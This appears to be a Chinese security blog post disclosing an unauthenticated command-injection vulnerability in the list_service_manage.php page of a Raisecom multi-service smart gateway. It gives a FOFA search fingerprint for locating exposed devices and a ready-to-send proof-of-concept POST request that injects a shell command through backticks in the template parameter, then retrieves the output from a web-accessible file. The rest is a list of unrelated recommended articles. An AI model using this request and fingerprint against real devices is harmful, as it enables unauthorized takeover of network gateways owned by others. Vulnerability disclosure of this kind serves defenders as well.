某智能网关 list_service_manage存在命令执行漏洞

外道・輪廻天生2024-09-12 1:06

漏洞描述

瑞斯康达多业务智能网关list_service_manage.php存在未授权命令注入漏洞,攻击者利用可获取服务器权限。

资产信息

FOFA:

复制代码 
body="/images/raisecom/back.gif"

漏洞复现

poc

复制代码 
POST /vpn/list_service_manage.php?template=%60whoami%3E%2Fwww%2Ftmp%2F1.txt%60 HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded


Nradius_submit=true

访问文件url+/tmp/1.txt获取命令回显

相关推荐
武帝为此6 分钟前
【Rabbit加密算法介绍】
算法·安全
humors2211 小时前
一些反恶意软件安全程序汇总
安全·杀毒·木马·反恶意软件·蠕虫·反流氓软件·反间谍软件
小二·1 小时前
2026年4月技术热点深度解析:AI智能体攻防、量子安全与云原生新纪元
人工智能·安全·云原生
赵侃侃爱分享1 小时前
网络安全常识十条
网络·安全·web安全
wanhengidc1 小时前
云手机搬砖安全吗
大数据·运维·服务器·安全·游戏·智能手机
wanhengidc1 小时前
服务器管理器的作用有哪些?
运维·服务器·网络·安全·游戏·智能手机
oi..2 小时前
CSRF安全攻防:Referer 校验与 Token 防护详解
前端·网络·笔记·测试工具·安全·网络安全·csrf
qq_260241232 小时前
将盾CDN:Web应用防火墙(WAF)的工作原理与实战配置
前端·网络·安全
Walk in loosing2 小时前
信创不再遥远
安全·低代码·健康医疗·政务
是小崔啊2 小时前
网络安全小白了解
网络·安全·web安全
热门推荐
01GitHub 镜像站点02一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛03OpenClaw 请求超时 llm request timed out 怎么解决?3 种方案实测,附完整排查流程04基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南05VMware Workstation Pro 17 虚拟机完整安装教程(2026最新)06AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析07Oh My Codex 快速使用指南08AI 编程效率翻倍:Superpowers Skills 上手清单 + 完整指南09CodeBuddy与WorkBuddy深度对比:腾讯两款AI工具差异及实操指南10实测!Gemma 4 成功跑在安卓手机上:离线 AI 助手终于来了